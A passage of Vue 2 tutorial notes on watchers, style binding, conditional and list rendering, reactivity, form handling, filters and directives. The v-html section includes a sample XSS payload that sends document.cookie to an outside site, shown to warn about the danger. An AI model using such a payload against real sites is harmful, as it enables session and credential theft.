    <div id="root">
    <h2>今天天气很{{info}}</h2>
    <!-- <button @click="isHot = !isHot">切换天气</button> -->
    <button @click="changeWeather()">切换天气</button>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    isHot: true
    },
    computed: {
    info() {
    return this.isHot ? '炎热' : '凉爽'
    }
    },
    methods: {
    changeWeather() {
    this.isHot = !this.isHot
    }
    },
    watch: {
    isHot: {
    // immediate: true, 开始时调用一次
    handler(newValue, oldValue) {
    console.log('isHot 被修改了', newValue, oldValue)
    }
    }
    }
    })
    </script>

Alternatively, with v.$watch:

    Vue.config.productionTip = false  // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    isHot: true
    },
    computed: {
    info() {
    return this.isHot ? '炎热' : '凉爽'
    }
    },
    methods: {
    changeWeather() {
    this.isHot = !this.isHot
    }
    }
    })

    v.$watch('isHot', {
    // immediate: true, 开始时调用一次
    handler(newValue, oldValue) {
    console.log('isHot 被修改了', newValue, oldValue)
    }
    })

023 Deep Watching

Deep watching:

1. By default, Vue's watch does not detect changes to values nested inside an object (it watches one level deep).
2. Set deep: true to detect changes at any depth.

Notes:

1. Vue itself can detect changes inside nested objects, but the watch API does not report them by default.
2. Decide whether to use deep watching based on the shape of your data.

For a property with nested structure, you can watch a specific path:

    <div id="root">
    <h3>a 的值为:{{numbers.a}}</h3>
    <button @click="numbers.a++">点我让 a + 1</button>
    <h3>b 的值为:{{numbers.b}}</h3>
    <button @click="numbers.b++">点我让 b + 1</button>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    isHot: true,
    numbers: {
    a: 1,
    b: 2
    }
    },
    methods: {
    changeWeather() {
    this.isHot = !this.isHot
    }
    },
    watch: {
    'numbers.a': {
    handler(){
    console.log('a 值被改变了!')
    }
    }
    }
    })
    </script>

Or enable deep watching with deep: true:

    watch: {
    numbers: {
    deep: true,
    handler(){
    console.log('numbers 值被改变了!')
    }
    }
    }

024 Watcher Shorthand

    watch: {
    // 简写
    isHot(newValue, oldValue) {
    console.log('isHot 被修改了', newValue, oldValue)
    }
    }

Or:

    v.$watch('isHot', function(newValue, oldValue) {
    console.log('isHot 被修改了', newValue, oldValue)
    })

The price of the shorthand is that you cannot set watcher options such as deep or immediate.

025 watch vs. computed

The difference between computed and watch:

1. Anything computed can do, watch can do as well.
2. The reverse does not hold: for example, watch can perform asynchronous work, which computed cannot.

Two important rules of thumb (see the sketch below):

1. Functions managed by Vue are best written as regular functions, so that this points to vm or the component instance.
2. Functions not managed by Vue (timer callbacks, ajax callbacks, Promise callbacks, and so on) are best written as arrow functions, so that this still ends up pointing to vm or the component instance.

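A minimal illustration of the two rules, using a timer callback as the function not managed by Vue (illustrative only):

new Vue({
  el: '#root',
  data: { msg: 'hello' },
  methods: {
    show() { // managed by Vue: a regular function, so this is vm
      setTimeout(() => {
        // not managed by Vue: an arrow function inherits this from show(), so it is still vm
        console.log(this.msg)
      }, 1000)
    }
  }
})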
Implementing the full-name example with watch:

    <div id="root">
    姓:<input type="text" v-model="firstName"><br />
    名:<input type="text" v-model="lastName"><br />
    姓名:<input type="text" v-model="fullName"><br />
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。

    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    firstName: '张',
    lastName: '三',
    fullName: '张-三'
    },
    watch: {
    firstName(val) {
    this.fullName = val + '-' + this.lastName
    },
    lastName(val) {
    this.fullName = this.firstName + '-' + val
    }
    }
    })
    </script>

X. Binding Styles

026 Binding class Styles

Binding class styles:

Form | When to use
String form | The class name is undetermined and must be set dynamically
Array form | The number of classes to bind and their names are both undetermined
Object form | The number of classes and their names are fixed, but whether to apply each is decided dynamically

Code:

    <!DOCTYPE html>
    <html lang="en">

    <head>
    <meta charset="UTF-8">
    <title>Document</title>
    <style>
    .basic {
    width: 400px;
    height: 100px;
    border: 1px solid black;
    }

    .happy {
    border: 4px solid red;
    background-color: rgba(255, 255, 0, 0.644);
    background: linear-gradient(30deg, yellow, pink, orange, yellow);
    }

    .sad {
    border: 4px dashed rgb(2, 197, 2);
    background-color: gray;
    }

    .normal {
    background-color: skyblue;
    }

    .style1 {
    background-color: yellowgreen;
    }

    .style2 {
    font-size: 30px;
    text-shadow: 2px 2px 10px red;
    }

    .style3 {
    border-radius: 20px;
    }
    </style>
    <!-- 引入 Vue -->
    <script type="text/javascript" src="../js/vue.js"></script>
    </head>

    <body>
    <div id="root">
    <!-- 绑定 class 样式--字符串写法,适用于:样式的类名不确定,需要动态指定 -->
    <div class="basic" :class="mood" @click="changeMood">{{name}}</div><br><br>
    <!-- 绑定 class 样式--数组写法,适用于:要绑定的样式个数不确定、名字也不确定 -->
    <div class="basic" :class="classArr">{{name}}</div><br><br>
    <!-- 绑定 class 样式--对象写法,适用于:要绑定的样式个数确定、名字也确定,但要动态决定用不用 -->
    <div class="basic" :class="classObj">{{name}}</div>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    name: 'Vue',
    mood: 'normal',
    classArr: ['style1', 'style2', 'style3'],
    classObj: {
    style1: false,
    style2: true
    }
    },
    methods: {
    changeMood() {
    const arr = ['happy', 'sad', 'normal']
    const index = Math.floor(Math.random() * 3)
    this.mood = arr[index]
    }
    },
    })
    </script>
    </body>

    </html>

Result: clicking the first box switches its mood class at random among happy, sad, and normal.

027 Binding style Styles

Binding styles:

1. class styles

  Syntax: :class="xxx", where xxx can be a string, an object, or an array.

  • String form: the class name is undetermined and fetched dynamically.
  • Array form: several classes to bind; their number and names are undetermined.
  • Object form: several classes whose number and names are fixed, but whether to apply each is decided dynamically.
2. style styles (less common)
  :style="{fontSize: xxx}", where xxx is a dynamic value.
  :style="[a,b]", where a and b are style objects.

    <!-- 绑定 style 样式--对象写法 -->
    <div class="basic" :style="styleObj">{{name}}</div><br><br>
    <!-- 绑定 style 样式--数组写法 -->
    <div class="basic" :style="styleArr">{{name}}</div><br><br>

The corresponding data on the Vue instance (note that styleArr must be built from literals, because this is not available inside the data object literal):

styleObj: {
fontSize: '40px',
color: 'red'
},
styleObj2: {
backgroundColor: 'orange'
},
styleArr: [
{fontSize: '40px', color: 'red'},
{backgroundColor: 'orange'}
]

XI. Conditional Rendering

028 Conditional Rendering

Conditional rendering:

1. v-if

  Syntax:

  • v-if="expression"
  • v-else-if="expression"
  • v-else (no expression)

  Best for: content that toggles infrequently.

  Behavior: elements that are not shown are removed from the DOM entirely.

  Note: v-if can be combined with v-else-if and v-else, but the elements must be adjacent; the chain must not be "broken" by other elements.

2. v-show

  Syntax: v-show="expression"

  Best for: content that toggles frequently.
  Behavior: hidden elements stay in the DOM and are merely hidden with CSS.

3. Note: with v-if, an element may not be obtainable from the DOM at all; with v-show it always is.

    <div id="root">
    <h2>当前 n 的值是 {{n}}</h2>
    <button @click="n++">点我 n + 1</button>
    <!-- 使用 v-show 做条件渲染 -->
    <h2 v-show="false">欢迎来到{{name}}</h2>
    <h2 v-show="true">欢迎来到{{name}}</h2>
    <!-- 使用 v-if 做条件渲染 -->
    <h2 v-if="false">欢迎来到{{name}}</h2>
    <h2 v-if="1 === 1">欢迎来到{{name}}</h2>
    <!-- v-if、v-else-if、v-else -->
    <div v-if="n === 1">Angular</div>
    <div v-else-if="n === 2">React</div>
<div v-else>Vue</div>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    name: 'Vue',
    n: 0
    }
    })
    </script>

XII. List Rendering

029 List Rendering

The v-for directive:

1. Renders lists of data.
2. Syntax: v-for="(item, index) in xxx" :key="yyy"
3. Can iterate over arrays, objects, strings (rare), and a fixed number of times (rare).
    <div id="root">
    <!-- 遍历数组 -->
    <h2>人员列表(遍历数组)</h2>
    <ul>
    <li v-for="(p, index) of persons" :key="index">
    {{p.name}}-{{p.age}}
    </li>
    </ul>
    <!-- 遍历对象 -->
    <h2>汽车信息(遍历对象)</h2>
    <ul>
    <li v-for="(value, k) of car" :key="k">
    {{k}}-{{value}}
    </li>
    </ul>
    <!-- 遍历字符串 -->
    <h2>测试遍历字符串</h2>
    <ul>
    <li v-for="(char, index) of str" :key="index">
    {{char}}-{{index}}
    </li>
    </ul>
    <!-- 遍历指定次数 -->
    <h2>测试遍历指定次数</h2>
    <ul>
    <li v-for="(number, index) of 5" :key="index">
    {{number}}-{{index}}
    </li>
    </ul>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    name: 'Vue',
    persons: [
    {id: '001', name: '张三', age: 18},
    {id: '002', name: '李四', age: 19},
    {id: '003', name: '王五', age: 20}
    ],
    car: {
    name: '奥迪 A8',
    price: 'price',
    color: '黑色'
    },
    str: 'hello'
    }
    })
    </script>


030 How key Works

Interview question: what does key do in React and Vue? (The inner workings of key)

1. The role of key in the virtual DOM: key is the identity of a virtual DOM node. When the data changes, Vue builds a new virtual DOM from the new data, then diffs it against the old virtual DOM using the rules below.

2. Comparison rules:

• The old virtual DOM contains a node with the same key as the new node:

  • If the node's content is unchanged, the existing real DOM node is reused.
  • If the content changed, a new real DOM node is created and replaces the one on the page.
• No node with the same key exists in the old virtual DOM:

  A new real DOM node is created and rendered to the page.

3. Problems that using index as the key can cause:

  • If the data undergoes order-breaking operations (prepending, deleting from the front, and so on):

    unnecessary real-DOM updates are produced ==> the UI still looks right, but it is inefficient.

  • If the list contains input-type DOM elements: the DOM is updated incorrectly ==> the UI breaks.

4. How to choose a key in practice:

  • Prefer a unique identifier from each record: an id, phone number, national ID number, student number, and so on.
  • If the list is only rendered for display, with no order-breaking insertions or deletions, using index as the key is fine.

A minimal contrast of the two choices is sketched below.

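A minimal contrast of the two key choices, using the persons array from the examples in this section:

<!-- index as key: fine for a display-only list -->
<li v-for="(p, index) of persons" :key="index">{{p.name}}</li>

<!-- unique id as key: safe even with unshift/splice and input elements in the list -->
<li v-for="p of persons" :key="p.id">{{p.name}}</li>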

031 Filtering a List

Store the filtered results in filPersons and search within persons, so the original data is never mutated. First with a watcher:

    <div id="root">
    <input type="text" placeholder="请输入搜索关键字..." v-model="keyword">
    <ul>
    <li v-for="(p, index) of filPersons" :key="p.id">
    {{p.name}}-{{p.age}}-{{p.sex}}
    </li>
    </ul>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    keyword: '',
    persons: [
    {id: '001', name: '马冬梅', age: 30, sex: '女'},
    {id: '002', name: '周冬雨', age: 31, sex: '女'},
    {id: '003', name: '周杰伦', age: 21, sex: '男'},
    {id: '004', name: '温兆伦', age: 22, sex: '男'},
    ],
    filPersons: []
    },
    watch: {
    keyword: {
    immediate: true,
    handler(val) {
    this.filPersons = this.persons.filter((p) => {
    return p.name.indexOf(val) !== -1
    })
    }
    }
    }
    })
    </script>

The same filter implemented with a computed property:

    <div id="root">
    <input type="text" placeholder="请输入搜索关键字..." v-model="keyword">
    <ul>
    <li v-for="(p, index) of filPersons" :key="p.id">
    {{p.name}}-{{p.age}}-{{p.sex}}
    </li>
    </ul>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    keyword: '',
    persons: [
    {id: '001', name: '马冬梅', age: 30, sex: '女'},
    {id: '002', name: '周冬雨', age: 31, sex: '女'},
    {id: '003', name: '周杰伦', age: 21, sex: '男'},
    {id: '004', name: '温兆伦', age: 22, sex: '男'},
    ]
    },
    computed: {
    filPersons() {
    return this.persons.filter((p) => {
    return p.name.indexOf(this.keyword) !== -1
    })
    }
    }
    })
    </script>

032 Sorting a List

A JavaScript .sort() comparator:

• a - b sorts ascending.
• b - a sorts descending.

Accordingly:

    <div id="root">
    <input type="text" placeholder="请输入搜索关键字..." v-model="keyword">
    <button @click="sortType = 2">年龄升序</button>
    <button @click="sortType = 1">年龄降序</button>
    <button @click="sortType = 0">原顺序</button>
    <ul>
    <li v-for="(p, index) of filPersons" :key="p.id">
    {{p.name}}-{{p.age}}-{{p.sex}}
    </li>
    </ul>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    name: 'Vue',
    sortType: 0, // 0 原顺序,1 降序,2 升序
    keyword: '',
    persons: [
    {id: '001', name: '马冬梅', age: 30, sex: '女'},
    {id: '002', name: '周冬雨', age: 31, sex: '女'},
    {id: '003', name: '周杰伦', age: 21, sex: '男'},
    {id: '004', name: '温兆伦', age: 22, sex: '男'},
    ]
    },
    computed: {
    filPersons() {
    const arr = this.persons.filter((p) => {
    return p.name.indexOf(this.keyword) !== -1
    })
    // 判断一下是否需要排序
    if (this.sortType) {
    arr.sort((p1, p2) => {
    return this.sortType === 1 ? p2.age - p1.age : p1.age - p2.age
    })
    }

    return arr
    }
    }
    })
    </script>

033 An Update Quirk & 034 How Vue Detects Changes: Objects

The core of Vue's change detection is its reactivity system, which combines data hijacking with dependency tracking to detect mutations and update reactively. The main ideas:


1. Data hijacking (Object.defineProperty or Proxy)

Vue 2 uses Object.defineProperty; Vue 3 switched to the more powerful Proxy.

In Vue 2:
• Object.defineProperty intercepts reads and writes of object properties.
• Each property gets a getter and a setter:
  • getter: runs when the property is read, and records the dependency.
  • setter: runs when the property is written, and notifies dependents to update.
Limitations:
• Only pre-existing properties can be hijacked; adding or deleting properties is not reactive (use Vue.set).
• Native array methods (push, splice, and so on) need special handling; Vue rewrites them to make them reactive.
In Vue 3:
• Proxy observes every operation on an object directly, including property addition and deletion and index assignment on arrays.
• It is more flexible and faster, removing several Vue 2 limitations.

2. Dependency tracking

The reactivity system is built on dependency collection and a publish/subscribe pattern.

Key pieces:
• Watcher
  • Every component and computed property has a Watcher instance that records which reactive data it depends on.
  • When that data changes, the Watcher is triggered to update.
• Dep (Dependency)
  • A dependency manager holding all the Watchers that depend on a piece of reactive data.
  • When the data changes, the Dep notifies the relevant Watchers.
Workflow:
1. When data is read (via the getter), the currently active Watcher is added to that data's dependency list.
2. When data is written (via the setter), the corresponding Dep notifies every dependent to update.

3. Virtual DOM and batched updates

Vue pairs the virtual DOM with an async queue to optimize updates:

• When data changes, the setter notifies dependents, but the DOM is not updated immediately.
• Updates are queued and flushed in batch on the next tick of the event loop, avoiding repeated DOM work.

4. What the reactivity system enables

• Two-way binding: v-model keeps forms and data in sync.
• Computed properties: recomputed automatically when dependencies change.
• Watchers: watch observes specific data and runs callbacks.

Summary

Vue's reactivity works through these cooperating mechanisms:

1. Data hijacking (Vue 2: Object.defineProperty; Vue 3: Proxy).
2. Dependency collection with publish/subscribe.
3. The virtual DOM plus an async update queue, for performance and ergonomics.

The design is efficient and hides the complexity, making data binding and state management feel natural. A minimal sketch of the hijacking idea follows.

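A minimal sketch of data hijacking with change notification (illustrative only; Vue's real Observer/Dep/Watcher machinery is far richer):

function observe(data, onChange) {
  Object.keys(data).forEach(key => {
    let internal = data[key]
    Object.defineProperty(data, key, {
      get() {
        // A real implementation would record the currently active Watcher here (dependency collection).
        return internal
      },
      set(value) {
        if (value === internal) return
        internal = value
        onChange(key, value) // notify dependents; Vue would queue an async re-render
      }
    })
  })
}

const state = { count: 0 }
observe(state, (key, value) => console.log(`${key} changed to`, value))
state.count = 1 // logs: count changed to 1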
035 The Vue.set() Method

**A property must have a get() and a set() before Vue can track it!** To add a property to an object in data reactively, use Vue.set(), which installs the getter/setter:

    <div id="root">
    <h1>学生信息</h1>
    <button @click="addSex">添加一个性别属性,默认值是男</button>
    <h2>姓名:{{student.name}}</h2>
    <h2 v-if="student.sex">性别:{{student.sex}}</h2>
    <h2>年龄:真实{{student.age.rAge}},对外{{student.age.sAge}}</h2>
    <h2>朋友们</h2>
    <ul>
    <li v-for="(f, index) in student.friends" :key="index">
    {{f.name}}-{{f.age}}
    </li>
    </ul>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    student: {
    name: 'tom',
    age: {
    rAge: 40,
    sAge: 29,
    },
    friends: [
    {name: 'jerry', age: 35},
    {name: 'tony', age: 36}
    ]
    }
    },
    methods: {
    addSex() {
    // Vue.set(this.student, 'sex', '男')
    this.$set(this.student, 'sex', '男')
    }
    }
    })
    </script>

036 How Vue Detects Changes: Arrays

Writes through an array index are not tracked! Vue only detects array changes made through the methods listed below, which it wraps:

In Vue 2, array change detection is limited: because of how JavaScript arrays work, Vue cannot observe certain direct operations, so it ships wrapped versions of the mutating methods that guarantee reactive updates. The wrappers augment the reactivity system so that mutations are detected and propagated correctly.

Vue 2 wraps the following seven native array methods:


1. push()

• Purpose: append one or more elements to the end of the array.
• Update: reactively appends and triggers a view update.

  let vm = new Vue({
  data: {
  items: [1, 2, 3]
  }
  });

  vm.items.push(4); // reactive; the view updates

2. pop()

• Purpose: remove the last element.
• Update: reactive removal with a view update.
  vm.items.pop(); // removes 3; the view updates

3. shift()

• Purpose: remove the first element.
• Update: reactive removal with a view update.
  vm.items.shift(); // removes 1; the view updates

4. unshift()

• Purpose: add one or more elements to the front.
• Update: reactive insertion with a view update.
  vm.items.unshift(0); // adds 0; the view updates

5. splice()

• Purpose: add, replace, or remove elements.
• Update: reactive mutation with a view update.
  vm.items.splice(1, 1, 'a'); // replaces the element at index 1 with 'a'

6. sort()

• Purpose: sort the array.
• Update: reactive sort with a view update.
  vm.items.sort(); // sorts lexicographically; the view updates

7. reverse()

• Purpose: reverse the array's order.
• Update: reactive reversal with a view update.
  vm.items.reverse(); // reverses the order; the view updates

Caveats

1. Assigning through an index does not trigger an update

  • Vue 2 cannot observe operations like vm.items[0] = 10.
  • Workaround: use Vue.set().
    Vue.set(vm.items, 0, 10); // reactively updates index 0
2. Changing the array's length directly does not trigger an update

  • Operations like vm.items.length = 2 are not reactive.
  • Avoid assigning to length directly.

Through these wrapped methods, Vue 2 observes array mutations and triggers the corresponding view updates automatically; this is a core part of its reactivity system.

Vue.set() can also be used to update an array element reactively:

Vue.set(vm._data.student.hobby, 1, '打台球')

037 Summary: How Vue Watches Data

How Vue watches data:

1. Vue watches every level of the data in data;

2. How are objects observed?

  Via setters, and the data to observe must be passed in when new Vue is called.

  • Properties appended to an object later are not reactive by default.
  • To make a later-added property reactive, use one of these APIs:
    • Vue.set(target, propertyName/index, value)
    • vm.$set(target, propertyName/index, value)
3. How are arrays observed?

  By wrapping the array mutation methods; the wrapper does two things:

  • Calls the corresponding native method to update the array.
  • Re-parses the template, updating the page.
4. To modify an element of an array in Vue, always use one of:

  • The wrapped APIs: push(), pop(), shift(), unshift(), splice(), sort(), reverse()
  • Vue.set() or vm.$set()

Note well: Vue.set() and vm.$set() cannot add properties to vm itself or to vm's root data object!

    <div id="root">
    <h1>学生信息</h1>
    <button @click="student.age++">年龄 +1 岁</button><br>
    <button @click="addSex">添加性别属性,默认值:男</button><br>
    <button @click="student.sex = '未知'">修改性别</button><br>
    <button @click="addFriend">在列表首位添加一个朋友</button><br>
    <button @click="updateFirstFriendName">修改第一个朋友的名字为:张三</button><br>
    <button @click="addHobby">添加一个爱好</button><br>
    <button @click="updateHobby">修改第一个爱好为:开车</button><br>
    <button @click="removeSmoke">过滤掉爱好中的抽烟</button><br>
    <h3>姓名:{{student.name}}</h3>
    <h3>年龄:{{student.age}}</h3>
    <h3 v-if="student.sex">性别:{{student.sex}}</h3>
    <h3>爱好:</h3>
    <ul>
    <li v-for="(h, index) in student.hobby" :key="index">
    {{h}}
    </li>
    </ul>
    <h3>朋友们:</h3>
    <ul>
<li v-for="(f, index) in student.friends" :key="index">
    {{f.name}}--{{f.age}}
    </li>
    </ul>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    student: {
    name: 'tom',
    age: 18,
    hobby: ['抽烟', '喝酒', '烫头'],
    friends: [
    {name: 'jerry', age: 35},
    {name: 'tony', age: 36}
    ]
    }
    },
    methods: {
    addSex() {
    this.$set(this.student, 'sex', '男')
    },
    addFriend() {
    this.student.friends.unshift({name: 'mike', age: 18})
    },
    updateFirstFriendName() {
    this.student.friends[0].name = '张三'
    },
    addHobby() {
    this.student.hobby.push('打台球')
    },
    updateHobby() {
    this.$set(this.student.hobby, 0, '开车')
    },
    removeSmoke() {
    this.student.hobby = this.student.hobby.filter((h)=>{
    return h !== '抽烟'
    })
    }
    }
    })
    </script>

XIII. Collecting Form Data

038 Collecting Form Data

Collecting form data:
For <input type="text"/>, v-model collects value; what the user types is the value.
For <input type="radio"/>, v-model collects value, and each input must be given a value attribute.
For <input type="checkbox"/>:

1. Without a value attribute on the input, v-model collects checked (a boolean: ticked or not).
2. With a value attribute on the input:
  • If v-model's initial value is not an array, it still collects checked (the boolean).
  • If v-model's initial value is an array, it collects an array of the ticked values.

Note: v-model has three modifiers:

• lazy: sync the data only after the field loses focus
• number: coerce the input string to a valid number
• trim: strip leading and trailing whitespace

Code:

    <div id="root">
    <form @submit="demo">
    <label for="account">账号:</label><input type="text" id="account" v-model.trim="account"><br><br>
    <label for="password">密码:</label><input type="password" id="password" v-model="password"><br><br>
    <label for="number">年龄:</label><input type="number" id="age" v-model.number="age"><br><br>
    性别:
    <input type="radio" name="sex" v-model="sex" value="male">
    <input type="radio" name="sex" v-model="sex" value="female"><br><br>
    爱好:
    学习<input type="checkbox" v-model="hobby" value="study">
    打游戏<input type="checkbox" v-model="hobby" value="play">
    吃饭<input type="checkbox" v-model="hobby" value="eat"><br><br>
    所属校区
    <select v-model="city">
    <option value="">请选择校区</option>
    <option value="beijing">北京</option>
    <option value="shanghai">上海</option>
    <option value="shenzhen">深圳</option>
    <option value="wuhan">武汉</option>
    </select><br><br>
    其他信息:
    <textarea v-model.lazy="others"></textarea><br><br>
    <input type="checkbox" v-model="agree">阅读并接受<a href="www.baidu.com">《用户协议》</a><br><br>
    <button type="submit">提交</button>
    </form>

    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    account: '',
    password: '',
    age: '',
    sex: 'male',
    hobby: [],
    city: 'wuhan',
    others: '',
    agree: ''
    },
    methods: {
    demo() {
    alert("提交数据" + JSON.stringify(this._data))
    }
    }
    })
    </script>

The <form> element builds the form; @submit="demo" runs demo() when the form is submitted.

Field | Markup | Notes
Account | <label for="account">账号:</label><input type="text" id="account" v-model.trim="account"> | The label's for attribute binds it to the input, so clicking the label text also focuses the input; .trim strips leading/trailing whitespace.
Password | <label for="password">密码:</label><input type="password" id="password" v-model="password"> | type="password" masks the input.
Age | <label for="number">年龄:</label><input type="number" id="age" v-model.number="age"> | type="number" restricts the input to numbers; v-model.number stores the input as a number rather than a string.
Sex | 男<input type="radio" name="sex" v-model="sex" value="male"> 女<input type="radio" name="sex" v-model="sex" value="female"> | The shared name="sex" makes the radio buttons mutually exclusive; value="male" / value="female" controls what gets collected.
Hobbies | 学习<input type="checkbox" v-model="hobby" value="study"> 打游戏<input type="checkbox" v-model="hobby" value="play"> 吃饭<input type="checkbox" v-model="hobby" value="eat"> | hobby must be initialized as an array for multiple selection to collect values.
Campus | <select v-model="city"> <option value="">请选择校区</option> <option value="beijing">北京</option> <option value="shanghai">上海</option> <option value="shenzhen">深圳</option> <option value="wuhan">武汉</option> </select> | Choosing an option replaces the bound value.
Other info | <textarea v-model.lazy="others"></textarea> | With v-model.lazy, Vue syncs the value only when focus leaves the field, which saves work.
Agreement | <input type="checkbox" v-model="agree">阅读并接受<a href="www.baidu.com">《用户协议》</a> | A bare type="checkbox" collects true when ticked, false otherwise.
Submit | <button type="submit">提交</button> | type="submit" is optional here: the first <button> in a <form> submits it by default.


XIV. Filters

039 Filters

Filters:

Definition: format data before it is displayed (suited to simple formatting; anything complex still belongs in computed or methods).

Syntax:

1. Registering a filter: Vue.filter(name, callback) (global) or new Vue({filters: {...}}) (local)
2. Using a filter: {{xxx | filterName}} or v-bind:attr="xxx | filterName"

Notes:

1. Filters can take extra arguments, and several filters can be chained.
2. A filter never changes the original data; it produces new, derived data.

BootCDN (the Bootstrap 中文网 free CDN service) hosts the common JS libraries; grab day.min.js (Day.js) there.

Try it out:

    <div id="root">
    <h2>显示格式化后的时间</h2>
    <!-- 计算属性实现 -->
    <h3>现在是:{{fmtTime}}</h3>
    <!-- methods 实现 -->
    <h3>现在是:{{getFmtTime()}}</h3>
    <!-- 过滤器实现 -->
    <h3>现在是:{{time | timeFormater}}</h3>
    <!-- 过滤器实现(传参) -->
    <h3>现在是:{{time | timeFormater('YYYY-MM-DD') | mySlice}}</h3>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    time: 1731817795096
    },
    computed: {
    fmtTime() {
    return dayjs(this.time).format('YYYY-MM-DD HH:mm:ss')
    }
    },
    methods: {
    getFmtTime() {
    return dayjs(this.time).format('YYYY-MM-DD HH:mm:ss')
    }
    },
    filters: {
    timeFormater(value, format='YYYY-MM-DD HH:mm:ss') {
    return dayjs(value).format(format)
    },
    mySlice(value) {
    return value.slice(0, 4)
    }
    }
    })
    </script>

XV. Built-in Directives

040 The v-text Directive

The code below renders text into the <div>s, but does not render HTML markup.

    <div id="root">
    <div v-text="name"></div>
    <div>{{name}}</div>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    name: '<h2>古尔丹<h2>'
    }
    })
    </script>

041 The v-html Directive

The v-html directive:

1. Purpose: render content containing HTML markup into the given node.
2. Differences from interpolation:
  • v-html replaces the node's entire content; {{xx}} and v-text do not.
  • v-html interprets HTML markup.
3. Serious caveat: v-html is a security hazard!
  • Dynamically rendering arbitrary HTML on a site is very dangerous and invites XSS attacks.
  • Only use v-html on trusted content, and never on user-submitted content!

The code below renders text into the <div>s, and this time the HTML markup is rendered.

    <div id="root">
    <div v-html="name"></div>
    <div>{{name}}</div>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    name: '<a href=javascript:location.href="http://www.baidu.com?" + document.cookie>点开有惊喜!<a/>'
    }
    })
    </script>

This example is dangerous: it can ship the site's cookies off to another site, and if the key cookies are not flagged HttpOnly, that means leaked credentials!

The server decides whether you are logged in based on your cookies; anyone holding the same cookies can access the same account.

042 The v-cloak Directive

The v-cloak directive (takes no value):

1. It is just a special attribute; once the Vue instance is created and takes over the container, Vue removes the v-cloak attribute.
2. Paired with CSS (see the sketch below), v-cloak stops raw {{xxx}} from flashing on screen while scripts load slowly.

[v-cloak] {
display: none;
}

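A minimal usage sketch: with the CSS rule above in place, the heading stays hidden until Vue mounts and strips the attribute.

<h2 v-cloak>{{name}}</h2> <!-- hidden until Vue removes v-cloak -->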
043 The v-once Directive

The v-once directive:

1. A node with v-once is rendered dynamically once, then treated as static content.
2. Later data changes do not update the v-once subtree, which can be used to optimize performance (sketch below).

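A minimal usage sketch, assuming an n in data as in the earlier examples:

<h2 v-once>n was initially: {{n}}</h2> <!-- rendered once, then frozen -->
<h2>n is now: {{n}}</h2>
<button @click="n++">n + 1</button>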
044 The v-pre Directive

The v-pre directive:

1. Skips compilation of the node it is placed on.
2. Use it on nodes that contain no directive or interpolation syntax to speed up compilation (sketch below).

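A minimal usage sketch:

<h2 v-pre>This node is skipped by the compiler, so {{n}} renders literally</h2>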
XVI. Custom Directives

045 Custom Directives: Function Form & 046 Custom Directives: Object Form

Create a custom directive with the directives option:

A function under directives receives two arguments: the real DOM element the directive is bound to, and a binding object carrying the value passed in the binding.

    <div id="root">
    <h2>当前的 n 值是:<span v-text="n"></span></h2>
    <!-- 需求 1:定义一个 v-big 指令,和 v-text 功能类似,但会把绑定的数值扩大 10 倍。 -->
    <h2>放大 10 倍后的 n 值是:<span v-big="n"></span></h2>
    <button @click="n++">点我 n + 1</button>
    <hr>
<!-- 需求 2:定义一个 v-fbind 指令,和 v-bind 功能类似,但可以让其所绑定的 input 元素默认获取焦点。 -->
    <input type="text" v-fbind:value="n">
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    n: 1
    },
    directives: {
    // big 函数何时会被调用?
    // 1. 指令与元素成功绑定时(一上来)bind()
    // 2. 指令所在的模板被重新解析时 update()
    big(element, binding) {
    element.innerText = binding.value * 10
    console.log(element, binding)
    },
    fbind: {
    // 指令与元素成功绑定时(一上来)
    bind(element, binding) {
    element.value = binding.value
    },
    // 指令所在元素被插入页面时
    inserted(element, binding) {
    element.focus()
    },
    // 指令所在的模板被重新解析时
    update(element, binding) {
    element.value = binding.value
    }
    }
    }
    })
    </script>

047 Custom Directives: Summary

